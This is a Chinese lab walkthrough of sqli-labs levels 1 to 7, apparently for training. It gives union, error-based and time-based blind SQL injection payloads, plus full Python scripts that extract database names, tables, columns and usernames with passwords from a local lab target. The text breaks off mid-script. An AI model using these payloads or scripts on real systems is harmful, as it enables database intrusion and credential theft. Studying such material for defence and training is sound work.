Less-1:
我们可以在http://127.0.0.1/sqli-labs/Less-1/后输入一个 id=1' 在正常输入的1后面添上一个 ' ,看一下效果:
提示:SQL语法错误:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
从上述错误当中,我们可以看到提交到 sql语句 中的 1 ’ 在经过 sql 语句构造后形成 '1'' LIMIT 0,1 多加了一个 ’ 。这种方式就是从错误信息中得到我们所需要的信息,那我们接下来想如何将多余的 ‘ 去掉呢?
尝试在id=1后面加上:
' or 1=1 --+
此时构造的sql语句就成了:
select xxxx from xxxx where id='1' or 1=1 --+' limit 0,1
可以看到正常返回数据
此处可以利用 order by,使用order by 对前面的select 语句的数据进行排序,经过不断测试这里有三列数据,我们只能用order by 3,超过3就会报错
' order by 4 --+
的显示为:
最后从源代码中分析下为什么会造成注入?
Sql 语句为:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"
Id 参数在拼接 sql 语句时,未对 id 进行任何的过滤等操作,所以当提交 ' or 1=1 --+,直接构造的 sql 语句就是
SELECT * FROM users WHERE id='1' or 1=1 --+ LIMIT 0,1
这条语句因 or 1=1 所以为永恒真。
此外,此处介绍 union 联合注入,union 的作用是将两个 sql 语句进行联合。union 可以从下面的例子中可以看出,强调一点:union 前后的两个 sql 语句的选择列数要相同才可以。union all 与 union 的区别是增加了去重的功能。
我们这里根据SQL注入基础知识进行information_schema 知识的应用:
使用union联合注入:
当 id 的数据在数据库中不存在时,(此时我们可以 id=-1,两个 sql 语句进行联合操作时,当前一个语句选择的内容为空,我们这里就将后面的语句的内容显示出来)此处前台页面返回了我们构造的 union 的数据:
-1' union select 1,2,3 --+
根据返回值可以发现返回的是后面两列数据
爆所有数据库:
-1' union select 1,group_concat(schema_name),3 from information_schema.schemata --+
此时的 sql 语句为:
SELECT * FROM users WHERE id='-1' union select 1,group_concat(schema_name),3 from information_schema.schemata--+ LIMIT 0,1
爆破出的数据库名有:
information_schema,challenges,dvwa,mysql,performance_schema,security,test
爆当前数据库名及当前数据库的所有数据表:
-1' union select 1,group_concat(table_name),database() from information_schema.tables where table_schema=database() --+
此时的 sql 语句为:
SELECT * FROM users WHERE id='-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+ LIMIT 0,1
当前数据库名为:
security
当前数据库下的所有表名为:
emails,referers,uagents,users
爆users表的所有列名(字段名):
-1' union select 1,group_concat(column_name),database() from information_schema.columns where table_name='users' --+
此时的 sql 语句为:
SELECT * FROM users WHERE id='-1' union select 1,group_concat(column_name),database() from information_schema.columns where table_name='users' --+ LIMIT 0,1
当前users表的所有列名为:
user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password
爆数据:
-1' union select 1,group_concat(username,'-',password),database() from users --+
此时的 sql 语句为:
SELECT * FROM users WHERE id='-1' union select 1,group_concat(username,'-',password),database() from users --+ LIMIT 0,1
爆出的数据为:
Dumb-Dumb,Angelina-I-kill-you,Dummy-p@ssword,secure-crappy,stupid-stupidity,superman-genious,batman-mob!le,admin-admin,admin1-admin1,admin2-admin2,admin3-admin3,dhakkan-dumbo,admin4-admin4
使用报错注入:
使用与Less-5类似
?id=1' or 1= (select 1 from (select count(*),concat((select concat(username,"-",password) from users limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
Less-2:
将单引号添加到数字后面:
?id=1'
我们又得到了一个 Mysql 返回的错误,提示我们语法错误:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1
现在执行以查询语句:
select * from table where id=1';
所以这里的奇数个单引号破坏了查询,导致抛出错误
因此我们得出的结果是,查询代码使用了整数
源代码中可以分析到 SQL 语句为下:
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
对ID这个变量没有处理
可以成功注入的有::
or 1=1
or 1=1--+
其余的 payload 与 less1 中一致,只需要将 less1 中的 ‘ 去掉即可
使用union联合注入:
查看当前数据库名,版本信息:
?id=-1 union select 1,database(),version()--+
查看当前数据库用户:
?id=-1 union select 1,2,user()--+
爆所有数据库:
?id=-1 union select 1,database(),group_concat(schema_name) from information_schema.schemata --+
information_schema,challenges,dvwa,mysql,performance_schema,security,test
爆当前数据库名以及当前数据库的所有数据表:
?id=-1 union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() --+
emails,referers,uagents,users
爆users表的所有列名(字段名):
?id=-1 union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+
爆数据:
?id=-1 union select 1,group_concat(username),group_concat(password) from users --+
使用报错注入:
与Less-5类似:
?id=-1 or 1= (select 1 from (select count(*),concat((select concat(username,"-",password) from users limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Less-3:
将单引号添加到数字后面:
?id=1'
注入代码后,我们得到像这样的一个错误:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1
这里它意味着,开发者使用的查询是:
select login_name,password from table where id= ('$id')
所以我们再用这样的代码来进行注入:
?id=1')--+
这样一来,我们便可以得到用户名和密码了,同时后面查询也已经被注释掉了
在源代码中的 SQL 查询语句为:
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
可以成功注入的有:
?id=')--+
?id=') or '1'=('1
?id=') or 1=1--+
其余的 payload 与 less1 中一致,只需要将 less1 中的 ' 添加 ) 即 ')
?id=') union select 1,2,3--+
爆所有数据库:
?id=') union select 1,group_concat(schema_name),3 from information_schema.schemata --+
information_schema,challenges,dvwa,mysql,performance_schema,security,test
爆当前数据库名以及表名:
?id=') union select 1,group_concat(table_name),database() from information_schema.tables where table_schema=database() --+
爆users表的所有列名:
?id=') union select 1,group_concat(column_name),database() from information_schema.columns where table_schema=database() and table_name='users' --+
Less-4:
判断注入点:
我们使用?id=1'
发现并未报错
我们再次尝试双引号:
注入代码后,我们得到像这样的一个错误:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1
发现闭合是双引号和括号
这里它意味着,代码当中对 id 参数进行了 “” 和 () 的包装
可以尝试:
?id=1")--+
在源代码中的 SQL 查询语句:
$sql="SELECT * FROM users WHERE id=("$id") LIMIT 0,1";
可以成功注入的有:
?id=")--+
?id=") or 1=1 --+
?id=") or "1"=("1
其余的 payload 与 less1 中一致,只需要将 less1 中的 ‘ 更换为 “)
?id=") union select 1,2,3 --+
爆所有数据库:
?id=") union select 1,database(),group_concat(schema_name) from information_schema.schemata --+
爆当前数据库的所有表名:
?id=") union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() --+
爆users表的所有列名(字段名):
?id=") union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+
Less-5:
判断注入点:
我们使用?id=1'
发现报错:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
发现闭合是单引号且为单引号字符型注入:
?id=-1' or '1'='1
?id=1' and '1'='1
在源代码中的 SQL 查询语句为:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
爆破注入点:
一、使用Burp工具:
爆所有数据库:
?id=-1' or mid((select schema_name from information_schema.schemata limit 0,1),1,1)='a
?id=1' and mid((select schema_name from information_schema.schemata limit 0,1),1,1)='a
以上两种盲注都可以
使用Burp工具逐步对指定的位置进行攻击爆破
第一个数据库的第一位为i
以此逐步爆破
第一个数据库的第二位为
第一个数据库名为:
information_schema
二、使用python脚本爆破:
import requests
import time
# 模拟请求的一个库:
r = requests.session()
chars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_='
# 爆破当前数据库名长度:
def get_database_name_length() -> int:
print("===========正在爆破当前数据库名长度!!!================")
print("================请耐心等待!!!======================")
print("")
print("")
for i in range(50):
#关键代码url:
url = "http://192.168.239.5:9020/Less-5/?id=-1' or length(database())={} and sleep(0.1) and '1'='1".format(i)
start_time = time.time() # 这是请求前的时间
r.get(url) # 这是请求之后
if time.time() - start_time > 1: #当请求时间大于1秒的时候就说明数据库长度爆破成功!
length = i
break
print("============="+"当前数据库的长度为:{}".format(i))
print("")
print("")
return length
#爆破当前数据库名称:
def get_database_name(length):
print("===========正在爆破当前数据库名!!!====================")
print("================请耐心等待!!!=======================")
database_name = ''
for i in range(length+1): # 因为包含左不包含右,要想取到count就得+1
for j in range(1,128): #ascii码一共1~127,包含左不包含右,因此+1为128
url = "http://192.168.239.5:9020/Less-5/?id=-1' or ascii(substr((database()),{},1))={} and sleep(0.1) and '1'='1".format(i,j)
start_time = time.time()
r.get(url)
if time.time() - start_time >1:
database_name = database_name+chr(j)
print(database_name)
break
print("============="+"当前数据库名为:"+database_name)
print("")
print("")
return database_name
#爆破当前数据库下的表个数:
def get_table_name_count() -> int:
print("=========正在爆破当前数据库下的表个数!!!===============")
print("================请耐心等待!!!=======================")
print("")
print("")
for i in range(50):
#关键代码url:
url = "http://192.168.239.5:9020/Less-5/?id=-1' or (select count(table_name) from information_schema.tables where table_schema=database())={} and sleep(0.1) and '1'='1".format(i)
start_time = time.time()
r.get(url)
if time.time() - start_time > 1:
count = i
break
print("============="+"当前数据库下的数据表的个数为:{}".format(count))
print("")
print("")
return count
#爆破当前数据库下的每张表名的长度:
def get_table_name_length(count):
print("=========正在爆破当前数据库下的每张表名的长度!!!=========")
print("================请耐心等待!!!=======================")
print("")
print("")
for i in range(count):
for j in range(50):
url = "http://192.168.239.5:9020/Less-5/?id=-1' or length((select table_name from information_schema.tables where table_schema=database() limit {},1))={} and sleep(0.1) and '1'='1".format(i,j)
start_time = time.time()
r.get(url)
if time.time() - start_time > 1:
length = j
break
print("第{}张表的长度为:".format(i+1)+str(length))
print("=========以上为当前数据库下的每张表名的长度")
print("")
print("")
return 0
#爆破当前数据库下的所有数据表名:
def get_table_name(count):
print("=========正在爆破当前数据库下的所有表名!!!=========")
print("================请耐心等待!!!=======================")
table_name = ''
for i in range(count):
for j in range(50):
for k in range(1,128):
url = "http://192.168.239.5:9020/Less-5/?id=-1' or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1))={} and sleep(0.1) and '1'='1".format(i,j,k)
start_time = time.time()
r.get(url)
if time.time() - start_time > 1:
table_name += chr(k)
print(table_name)
break
print("第{}张数据表名为:".format(i+1)+table_name)
table_name=''
print("=========以上为当前数据库下的所有数据表名")
print("")
print("")
return 0
#爆破当前数据库下的users表的所有字段个数:
def get_column_name_count() -> int:
print("======正在爆破当前数据库下的users表的所有字段个数!!!======")
print("================请耐心等待!!!=======================")
print("")
print("")
for i in range(50):
url = "http://192.168.239.5:9020/Less-5/?id=-1' or (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')={} and sleep(0.1) and '1'='1".format(i)
start_time = time.time()
r.get(url)
if time.time() - start_time >1:
count = i
break
print("=============" + "当前数据库下的users表的所有字段个数为:{}".format(count))
print("")
print("")
return count
#爆破当前数据库下的users表的所有字段名:
def get_column_name(count):
print("======正在爆破当前数据库下的users表的所有字段名!!!=======")
print("================请耐心等待!!!=======================")
print("")
print("")
column_name = ''
for i in range(count):
for j in range(50):
for k in range(1,128):
url = "http://192.168.239.5:9020/Less-5/?id=-1' or ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit {},1),{},1))={} and sleep(0.1) and '1'='1".format(i,j,k)
start_time = time.time()
r.get(url)
if time.time() - start_time > 1:
column_name += chr(k)
print(column_name)
break
print("第{}个字段名为:".format(i + 1) + column_name)
column_name = ''
print("=========以上为当前数据库下的users表的所有字段名")
print("")
print("")
return 0
# 爆破当前users表有多少条数据记录:
def get_users_count() -> int:
print("======正在爆破当前users表有多少条数据记录!!!=======")
print("================请耐心等待!!!=======================")
for i in range(100):
url = "http://192.168.239.5:9020/Less-5/?id=-1' or (select count(*) from users )={} and sleep(0.1) and '1'='1".format(i)
start_time = time.time()
r.get(url)
if time.time() - start_time >1:
count = i
break
print("=============" + "当前users表有{}条数据记录".format(count))
print("")
print("")
return count
#爆破当前数据库中users表中的username字段和password的字段内容:
def get_username(count):
print("======正在爆破当前数据库中users表中的username字段和password的字段内容!!!=======")
print("=============================请耐心等待!!!===============================")
values1 = ''
values2 = ''
values3 = ''
for i in range(count):
for j in range(50):
for k in range(1,128):
url1 = "http://192.168.239.5:9020/Less-5/?id=-1' or ascii(substr((select id from users limit {},1),{},1))={} and sleep(0.1) and '1'='1".format(i,j,k)
url2 = "http://192.168.239.5:9020/Less-5/?id=-1' or ascii(substr((select username from users limit {},1),{},1))={} and sleep(0.1) and '1'='1".format(i,j,k)
url3 = "http://192.168.239.5:9020/Less-5/?id=-1' or ascii(substr((select password from users limit {},1),{},1))={} and sleep(0.1) and '1'='1".format(i,j,k)
start_time = time.time()
r.get(url1)
if time.time() - start_time >1:
values1 += chr(k)
start_time = time.time()
r.get(url2)
if time.time() - start_time > 1:
values2 += chr(k)
start_time = time.time()
r.get(url3)
if time.time() - start_time > 1:
values3 += chr(k)
print("===第{}条记录的id值为:{},username的值为:{},password的值为:{}".format(i+1,values1,values2,values3))
values1 = ''
values2 = ''
values3 = ''
print("=====以上为users表中所有数据========")
print("")
print("")
return 0
# 调用以上函数:
if __name__ == '__main__':
get_database_name(get_database_name_length()) #获取当前数据库名长度、获取当前数据库名长度
get_table_name_length(get_table_name_count()) #爆破当前数据库下的表个数、爆破当前数据库下的每张表名的长度
get_table_name(get_table_name_count()) #爆破当前数据库下的表个数、爆破当前数据库下的所有表名
get_column_name(get_column_name_count()) #爆破当前数据库下的users表的所有字段个数、爆破当前数据库下的users表的所有字段名
get_username(get_users_count()) #爆破当前users表有多少条数据记录、爆破当前数据库中users表中的username字段和password的字段内容
优化了最后一个爆破所有字段内容:
#爆破当前数据库中users表中的username字段和password的字段内容:
def get_username(count):
print("======正在爆破当前数据库中users表中的username字段和password的字段内容!!!=======")
print("=============================请耐心等待!!!===============================")
values = ''
for i in range(count):
for j in range(50):
for k in range(1,128):
url1 = "http://192.168.239.5:9020/Less-5/?id=-1' or ascii(substr((select concat(id,'---',username,'---',password) from users limit {},1),{},1))={} and sleep(0.1) and '1'='1".format(i,j,k)
# 此处的id,useranme,password以' - '分隔!
start_time = time.time()
r.get(url1)
if time.time() - start_time >1:
values += chr(k)
print(values)
break
print("===第{}条记录的id值为:".format(i+1)+values)
values = ''
print("=====以上为users表中所有数据========")
print("")
print("")
return 0
爆破返回结果:
优化后的代码输出为:
运行效率高许多!!!
有返回进度明显!
使用报错注入:
使用报错注入可以的到我们想要的信息:
一、第一种:
获得数据库:
?id=-1' or 1= (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
security
获得数据表:
?id=-1' or 1= (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
控制limit的起始参数获得第一个表名:emails
以此内推:referers
?id=-1' or 1= (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
http://192.168.239.5:9020/Less-5/?id=-1' or 1= (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
?id=-1' or 1= (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 3,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
获得字段名:
?id=-1' or 1= (select 1 from (select count(*),concat((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
?id=-1' or 1= (select 1 from (select count(*),concat((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
?id=-1' or 1= (select 1 from (select count(*),concat((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
获得字段值:
?id=-1' or 1= (select 1 from (select count(*),concat((select concat(username,'-',password) from users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
?id=-1' or 1= (select 1 from (select count(*),concat((select concat(username,'-',password) from users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
?id=-1' or 1= (select 1 from (select count(*),concat((select concat(username,'-',password) from users limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
以此类推可以获取所有数据!!
二、第二种:
?id=-1' or (select extractvalue(1,concat(0x7e,(select database())))) and '1'='1
用法与第一种类似!!
Less-6:
判断注入点:
我们使用?id=1'
发现并未报错
我们接下来尝试?id=1"
发现报错:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"" LIMIT 0,1' at line 1
发现闭合是单引号且为双引号字符型注入:
?id=-1" or "1"="1
?id=1" and "1"="1
在源代码中的 SQL 查询语句为:
$sql='SELECT * FROM users WHERE id="$id" LIMIT 0,1';
Less6 与 less5 的区别在于 less6 在 id 参数传到服务器时,对 id 参数进行了处理。这里可以从源代码中可以看到
那我们在这一关的策略和 less5 的是一样的。只需要将 ‘ 替换成 “
爆破注入点:
使用python编写脚本:
import requests
import time
# 模拟请求的一个库:
r = requests.session()
chars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_='
# # 爆破当前数据库名长度:
def get_database_name_length() -> int:
print("===========正在爆破当前数据库名长度!!!================")
print("================请耐心等待!!!======================")
print("")
print("")
for i in range(50):
#关键代码url:
url = 'http://192.168.239.5:9020/Less-6/?id=-1" or length(database())={} and sleep(1) and "1"="1'.format(i)
start_time = time.time() # 这是请求前的时间
r.get(url) # 这是请求之后
if time.time() - start_time > 1: #当请求时间大于1秒的时候就说明数据库长度爆破成功!
length = i
break
print("============="+"当前数据库的长度为:{}".format(i))
print("")
print("")
return length
# #爆破当前数据库名称:
def get_database_name(length):
print("===========正在爆破当前数据库名!!!====================")
print("================请耐心等待!!!=======================")
database_name = ''
for i in range(length+1): # 因为包含左不包含右,要想取到count就得+1
for j in range(1,128): #ascii码一共1~127,包含左不包含右,因此+1为128
url = 'http://192.168.239.5:9020/Less-6/?id=-1" or ascii(substr((database()),{},1))={} and sleep(0.1) and "1"="1'.format(i,j)
start_time = time.time()
r.get(url)
if time.time() - start_time >1:
database_name = database_name+chr(j)
print(database_name)
break
print("============="+"当前数据库名为:"+database_name)
print("")
print("")
return database_name
# #爆破当前数据库下的表个数:
def get_table_name_count() -> int:
print("=========正在爆破当前数据库下的表个数!!!===============")
print("================请耐心等待!!!=======================")
print("")
print("")
for i in range(50):
#关键代码url:
url = 'http://192.168.239.5:9020/Less-6/?id=-1" or (select count(table_name) from information_schema.tables where table_schema=database())={} and sleep(0.1) and "1"="1'.format(i)
start_time = time.time()
r.get(url)
if time.time() - start_time > 1:
count = i
break
print("============="+"当前数据库下的数据表的个数为:{}".format(count))
print("")
print("")
return count
# #爆破当前数据库下的每张表名的长度:
def get_table_name_length(count):
print("=========正在爆破当前数据库下的每张表名的长度!!!=========")
print("================请耐心等待!!!=======================")
print("")
print("")
for i in range(count):
for j in range(50):
url = 'http://192.168.239.5:9020/Less-6/?id=-1" or length((select table_name from information_schema.tables where table_schema=database() limit {},1))={} and sleep(0.1) and "1"="1'.format(i,j)
start_time = time.time()
r.get(url)
if time.time() - start_time > 1:
length = j
break
print("第{}张表的长度为:".format(i+1)+str(length))
print("=========以上为当前数据库下的每张表名的长度")
print("")
print("")
return 0
# #爆破当前数据库下的所有数据表名:
def get_table_name(count):
print("=========正在爆破当前数据库下的所有表名!!!=========")
print("================请耐心等待!!!=======================")
table_name = ''
for i in range(count):
for j in range(50):
for k in range(1,128):
url = 'http://192.168.239.5:9020/Less-6/?id=-1" or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1))={} and sleep(0.1) and "1"="1'.format(i,j,k)
start_time = time.time()
r.get(url)
if time.time() - start_time > 1:
table_name += chr(k)
print(table_name)
break
print("第{}张数据表名为:".format(i+1)+table_name)
table_name=''
print("=========以上为当前数据库下的所有数据表名")
print("")
print("")
return 0
# #爆破当前数据库下的users表的所有字段个数:
def get_column_name_count() -> int:
print("======正在爆破当前数据库下的users表的所有字段个数!!!======")
print("================请耐心等待!!!=======================")
print("")
print("")
for i in range(50):
url = 'http://192.168.239.5:9020/Less-6/?id=-1" or (select count(column_name) from information_schema.columns where table_schema=database() and table_name="users")={} and sleep(0.1) and "1"="1'.format(i)
start_time = time.time()
r.get(url)
if time.time() - start_time >1:
count = i
break
print("=============" + "当前数据库下的users表的所有字段个数为:{}".format(count))
print("")
print("")
return count
# #爆破当前数据库下的users表的所有字段名:
def get_column_name(count):
print("======正在爆破当前数据库下的users表的所有字段名!!!=======")
print("================请耐心等待!!!=======================")
print("")
print("")
column_name = ''
for i in range(count):
for j in range(50):
for k in range(1,128):
url = 'http://192.168.239.5:9020/Less-6/?id=-1" or ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit {},1),{},1))={} and sleep(0.1) and "1"="1'.format(i,j,k)
start_time = time.time()
r.get(url)
if time.time() - start_time > 1:
column_name += chr(k)
print(column_name)
break
print("第{}个字段名为:".format(i + 1) + column_name)
column_name = ''
print("=========以上为当前数据库下的users表的所有字段名")
print("")
print("")
return 0
# 爆破当前users表有多少条数据记录:
def get_users_count() -> int:
print("======正在爆破当前users表有多少条数据记录!!!=======")
print("================请耐心等待!!!=======================")
for i in range(100):
url = 'http://192.168.239.5:9020/Less-6/?id=-1" or (select count(*) from users )={} and sleep(0.1) and "1"="1'.format(i)
start_time = time.time()
r.get(url)
if time.time() - start_time >1:
count = i
break
print("=============" + "当前users表有{}条数据记录".format(count))
print("")
print("")
return count
#爆破当前数据库中users表中的username字段和password的字段内容:
def get_username(count):
print("======正在爆破当前数据库中users表中的username字段和password的字段内容!!!=======")
print("=============================请耐心等待!!!===============================")
values1 = ''
values2 = ''
values3 = ''
for i in range(count):
for j in range(50):
for k in range(1,128):
url1 = 'http://192.168.239.5:9020/Less-6/?id=-1" or ascii(substr((select id from users limit {},1),{},1))={} and sleep(0.1) and "1"="1'.format(i,j,k)
url2 = 'http://192.168.239.5:9020/Less-6/?id=-1" or ascii(substr((select username from users limit {},1),{},1))={} and sleep(0.1) and "1"="1'.format(i,j,k)
url3 = 'http://192.168.239.5:9020/Less-6/?id=-1" or ascii(substr((select password from users limit {},1),{},1))={} and sleep(0.1) and "1"="1'.format(i,j,k)
start_time = time.time()
r.get(url1)
if time.time() - start_time >1:
values1 += chr(k)
start_time = time.time()
r.get(url2)
if time.time() - start_time > 1:
values2 += chr(k)
start_time = time.time()
r.get(url3)
if time.time() - start_time > 1:
values3 += chr(k)
print("===第{}条记录的id值为:{},username的值为:{},password的值为:{}".format(i+1,values1,values2,values3))
values1 = ''
values2 = ''
values3 = ''
print("=====以上为users表中所有数据========")
print("")
print("")
return 0
# 调用以上函数:
if __name__ == '__main__':
get_database_name(get_database_name_length()) #获取当前数据库名长度、获取当前数据库名长度
get_table_name_length(get_table_name_count()) #爆破当前数据库下的表个数、爆破当前数据库下的每张表名的长度
get_table_name(get_table_name_count()) #爆破当前数据库下的表个数、爆破当前数据库下的所有表名
get_column_name(get_column_name_count()) #爆破当前数据库下的users表的所有字段个数、爆破当前数据库下的users表的所有字段名
get_username(get_users_count()) #爆破当前users表有多少条数据记录、爆破当前数据库中users表中的username字段和password的字段内容
爆破返回结果:
使用报错注入:
与Less-5的报错类似,至少这题的闭合方式是双引号字符型
?id=-1" or 1= (select 1 from (select count(*),concat((select concat(username,"-",password) from users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and "1"="1
?id=-1" or 1= (select 1 from (select count(*),concat((select concat(username,"-",password) from users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and "1"="1
?id=-1" or 1= (select 1 from (select count(*),concat((select concat(username,"-",password) from users limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and "1"="1
控制limit起始位置依次获得数据!
Less-7:
判断注入点:
判断闭合方式:
'))
使用python脚本爆破:
import requests
import time
# 模拟请求的一个库:
r = requests.session()
chars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_='
# 爆破当前数据库名长度:
def get_database_name_length() -> int:
print("===========正在爆破当前数据库名长度!!!================")
print("================请耐心等待!!!======================")
print("")
print("")
for i in range(50):
#关键代码url:
url = "http://192.168.0.128:9020/Less-7/?id=-1')) or length(database())={} and sleep(0.1) and '1'=(('1".format(i)
start_time = time.time() # 这是请求前的时间
r.get(url) # 这是请求之后
if time.time() - start_time > 1: #当请求时间大于1秒的时候就说明数据库长度爆破成功!
length = i
break
print("============="+"当前数据库的长度为:{}".format(i))
print("")
print("")
return length
#爆破当前数据库名称:
def get_database_name(length):
print("===========正在爆破当前数据库名!!!====================")
print("================请耐心等待!!!=======================")
database_name = ''
for i in range(length+1): # 因为包含左不包含右,要想取到count就得+1
for j in range(1,128): #ascii码一共1~127,包含左不包含右,因此+1为128
url = "http://192.168.0.128:9020/Less-7/?id=-1')) or ascii(mid(database(),{},1))={} and sleep(0.1) and '1'=(('1".format(i,j)
start_time = time.time()
r.get(url)
if time.time() - start_time >1:
database_name = database_name+chr(j)
print(database_name)
break
print("============="+"当前数据库名为:"+database_name)
print("")
print("")
return database_name
#爆破当前数据库下的表个数:
def get_table_name_count() -> int:
print("=========正在爆破当前数据库下的表个数!!!===============")
print("================请耐心等待!!!=======================")
print("")
print("")
for i in range(50):
#关键代码url:
url = "http://192.168.0.128:9020/Less-7/?id=-1')) or (select count(table_name) from information_schema.tables where table_schema=database())={} and sleep(0.1) and '1'=(('1".format(i)
start_time = time.time()
r.get(url)
if time.time() - start_time > 1:
count = i
break
print("============="+"当前数据库下的数据表的个数为:{}".format(count))
print("")
print("")
return count
#爆破当前数据库下的每张表名的长度:
def get_table_name_length(count):
print("=========正在爆破当前数据库下的每张表名的长度!!!=========")
print("================请耐心等待!!!=======================")
print("")
print("")
for i in range(count):
for j in range(50):
url = "http://192.168.0.128:9020/Less-7/?id=-1')) or length((select table_name from information_schema.tables where table_schema=database() limit {},1))={} and sleep(0.1) and '1'=(('1".format(i,j)
start_time = time.time()
r.get(url)
if time.time() - start_time > 1:
length = j
break
print("第{}张表的长度为:".format(i+1)+str(length))
print("=========以上为当前数据库下的每张表名的长度")
print("")
print("")
return 0
#爆破当前数据库下的所有数据表名:
def get_table_name(count):
print("=========正在爆破当前数据库下的所有表名!!!=========")
print("================请耐心等待!!!=======================")
table_name = ''
for i in range(count):
for j in range(50):
for k in range(1,128):
url = "http://192.168.0.128:9020/Less-7/?id=-1')) or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1))={} and sleep(0.1) and '1'=(('1".format(i,j,k)
start_time = time.time()
r.get(url)
if time.time() - start_time > 1:
table_name += chr(k)
print(table_name)
break
print("第{}张数据表名为:".format(i+1)+table_name)
table_name=''
print("=========以上为当前数据库下的所有数据表名")
print("")
print("")
return 0
#爆破当前数据库下的users表的所有字段个数:
def get_column_name_count() -> int:
print("======正在爆破当前数据库下的users表的所有字段个数!!!======")
print("================请耐心等待!!!=======================")
print("")
print("")
for i in range(50):
url = "http://192.168.0.128:9020/Less-7/?id=-1')) or (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')={} and sleep(0.1) and '1'=(('1".format(i)
start_time = time.time()
r.get(url)
if time.time() - start_time >1:
count = i
break
print("=============" + "当前数据库下的users表的所有字段个数为:{}".format(count))
print("")
print("")
return count
#爆破当前数据库下的users表的所有字段名:
def get_column_name(count):
print("======正在爆破当前数据库下的users表的所有字段名!!!=======")
print("================请耐心等待!!!=======================")
print("")
print("")
column_name = ''
for i in range(count):
for j in range(50):
for k in range(1,128):
url = "http://192.168.0.128:9020/Less-7/?id=-1')) or ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit {},1),{},1))={} and sleep(0.1) and '1'=(('1".format(i,j,k)
start_time = time.time()
r.get(url)
if time.time() - start_time > 1:
column_name += chr(k)
print(column_name)
break
print("第{}个字段名为:".format(i + 1) + column_name)
column_name = ''
print("=========以上为当前数据库下的users表的所有字段名")
print("")
print("")
return 0
# 爆破当前users表有多少条数据记录:
def get_users_count() -> int:
print("======正在爆破当前users表有多少条数据记录!!!=======")
print("================请耐心等待!!!=======================")
for i in range(100):
url = "http://192.168.0.128:9020/Less-7/?id=-1')) or (select count(*) from users )={} and sleep(0.1) and '1'=(('1".format(i)
start_time = time.time()
r.get(url)
if time.time() - start_time >1:
count = i
break
print("=============" + "当前users表有{}条数据记录".format(count))
print("")
print("")
return count
#爆破当前数据库中users表中的username字段和password的字段内容:
def get_username(count):
print("======正在爆破当前数据库中users表中的username字段和password的字段内容!!!=======")
print("=============================请耐心等待!!!===============================")
values = ''
for i in range(count):
for j in range(50):
for k in range(1,128):
url1 = "http://192.168.0.128:9020/Less-7/?id=-1')) or ascii(substr((select concat(id,'---',username,'---',password) from users limit {},1),{},1))={} and sleep(0.1) and '1'=(('1".format(i,j,k)
# 此处的id,useranme,password以' - '分隔!
start_time = time.time()
r.get(url1)
if time.time() - start_time >1:
values += chr(k)
print(values)
break
print("===第{}条记录的id值为:".format(i+1)+values)
values = ''
print("=====以上为users表中所有数据========")
print("")
print("")
return 0
# 调用以上函数:
if __name__ == '__main__':
get_database_name(get_database_name_length()) #获取当前数据库名长度、获取当前数据库名
